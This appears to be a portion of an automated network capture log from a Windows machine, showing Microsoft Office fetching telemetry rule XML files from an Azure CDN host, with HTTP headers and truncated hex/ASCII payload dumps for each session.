2024-10-30 02:46:50 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
97192.168.2.44985213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:50 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:50 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:50 GMT
Content-Type: text/xml
Content-Length: 1397
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
ETag: "0x8DC582BE7262739"
x-ms-request-id: f0c9e92d-201e-0000-1199-25a537000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024650Z-16849878b78qwx7pmw9x5fub1c00000005f000000000qk42
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:50 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


Session IDSource IPSource PortDestination IPDestination Port
98192.168.2.44985313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:50 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:50 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:50 GMT
Content-Type: text/xml
Content-Length: 1360
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
ETag: "0x8DC582BDDEB5124"
x-ms-request-id: bc157e3b-201e-000c-6094-2979c4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024650Z-17c5cb586f62blg5ss55p9d6fn00000008ag000000003sr9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:50 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
99192.168.2.44985413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:50 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:50 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:50 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
ETag: "0x8DC582BDCB4853F"
x-ms-request-id: 0df29f50-101e-005a-068d-27882b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024650Z-16849878b78qfbkc5yywmsbg0c000000071000000000ny4m
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:50 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session IDSource IPSource PortDestination IPDestination Port
100192.168.2.44985513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:51 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:51 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:51 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
ETag: "0x8DC582BDB779FC3"
x-ms-request-id: 66721f0b-e01e-00aa-4086-29ceda000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024651Z-17c5cb586f6r59nt869u8w8xt800000006d0000000009dr2
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:51 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


Session IDSource IPSource PortDestination IPDestination Port
101192.168.2.44985613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:51 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:51 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:51 GMT
Content-Type: text/xml
Content-Length: 1397
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BDFD43C07"
x-ms-request-id: 27230864-a01e-0070-6533-26573b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024651Z-17c5cb586f69w69mgazyf263an00000006n0000000008653
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:51 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


Session IDSource IPSource PortDestination IPDestination Port
102192.168.2.44985713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:51 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:51 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:51 GMT
Content-Type: text/xml
Content-Length: 1360
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
ETag: "0x8DC582BDD74D2EC"
x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024651Z-15b8d89586fvpb59307bn2rcac00000002m0000000005vfg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:51 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
103192.168.2.44985813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:51 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:51 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:51 GMT
Content-Type: text/xml
Content-Length: 1427
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE56F6873"
x-ms-request-id: 08f6a26f-f01e-0071-6b1c-27431c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024651Z-16849878b78fhxrnedubv5byks00000005vg0000000007ca
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:51 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


Session IDSource IPSource PortDestination IPDestination Port
104192.168.2.44985913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:51 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:51 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:51 GMT
Content-Type: text/xml
Content-Length: 1390
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
ETag: "0x8DC582BE3002601"
x-ms-request-id: 6796a20d-a01e-00ab-565f-279106000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024651Z-17c5cb586f6f8m6jnehy0z65x400000006qg000000008dyv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:51 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


Session IDSource IPSource PortDestination IPDestination Port
105192.168.2.44986013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:51 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:52 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:52 GMT
Content-Type: text/xml
Content-Length: 1401
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
ETag: "0x8DC582BE2A9D541"
x-ms-request-id: 6b4870b1-101e-0034-5fde-2896ff000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024652Z-r197bdfb6b4bq7nf8dgr5rzeq400000002p000000000c06w
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:52 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


Session IDSource IPSource PortDestination IPDestination Port
106192.168.2.44986113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:52 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:52 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:52 GMT
Content-Type: text/xml
Content-Length: 1364
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB6AD293"
x-ms-request-id: ded904a3-601e-000d-0f3d-262618000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024652Z-r197bdfb6b42rt68rzg9338g1g00000008ng00000000eqst
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:52 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
107192.168.2.44986213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:52 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:52 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:52 GMT
Content-Type: text/xml
Content-Length: 1391
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF58DC7E"
x-ms-request-id: 4fde2afa-301e-0099-279b-276683000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024652Z-r197bdfb6b4xfp4mncra29rqkc00000000xg000000004zu3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:52 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
